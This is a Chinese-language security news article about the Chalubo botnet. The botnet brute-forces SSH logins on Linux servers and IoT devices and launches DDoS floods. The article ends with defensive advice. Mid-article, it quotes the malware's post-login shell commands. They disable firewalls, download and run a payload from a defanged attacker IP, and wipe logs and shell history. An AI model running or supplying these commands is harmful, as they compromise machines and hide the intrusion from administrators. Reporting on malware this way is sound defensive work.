近日,某知名网络安全公司发表的一篇文章指出,一种被他们称之为“Chalubo”的最新自动化DDoS攻击工具正在互联网上频繁出现,主要针对的目标是开启了SSH服务器的Linux服务器以及各种智能物联网设备。攻击者使用ChaCha流密码来加密Chalubo的主组件以及相应的Lua脚本,通过常见的Windows恶意软件原则以阻止检测。
该僵尸网络病毒在两个月前就已经开始出现,通过网络感染各种智能联网设备以及服务器,最开始该病毒只能在x86处理器架构的系统上运行,随着不断的测试和升级,到目前为止,已经可以在不同处理器架构上运行,包括32位和64位的ARM、x86、x86_64、MIPS、MIPSEL和PowerPC等,在未来的这段时间里,该僵尸网络病毒的攻击活动数量将持续上升。
该网络安全公司表示,从相关的数据记录可以看到,Chalubo病毒首先会尝试暴力破解密码,强制登录SSH服务器,一旦获得了目标设备的访问权限,就会发出以下命令:
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/
chmod 777 /usr/bin/libsdes
nohup /usr/bin/libsdes < /dev/null 2<&1 &
export HISTFILE=/dev/null
rm -f /var/log/wtmp
history -c
虽然这样的攻击方式非常常见,但攻击者使用了分层方法来删除恶意组件,而且使用的加密不是我们通常在Linux恶意软件中看到的加密,这就是比较复杂的了。
通过查看该僵尸网络病毒的代码可以看到,Chalubo病毒借鉴了Xor.DDoS恶意软件中的DelService和AddService函数,以及Mirai恶意软件中的一些随机函数和util_local_addr函数的扩展代码。但大部分功能代码都是全新的,专注于他们自己的Lua处理,主要是用DNS、UDP和SYN风格执行DoS攻击。Chalubo病毒通过端口10100对单个中文IP地址执行SYN泛洪攻击,而不屏蔽本地源IP。
墨者安全网络安全高防团队通过对该僵尸网络病毒的深入研究,给大家一些预防建议和防范措施,由于该病毒感染目标的主要方法是通过使用通用账户和密码登入获得权限,所以我们要做的第一件事就是更改这些设备上的默认密码,其次就是要保持系统更新、及时安装官方发布的修复补丁,保障设备网络安全。
-->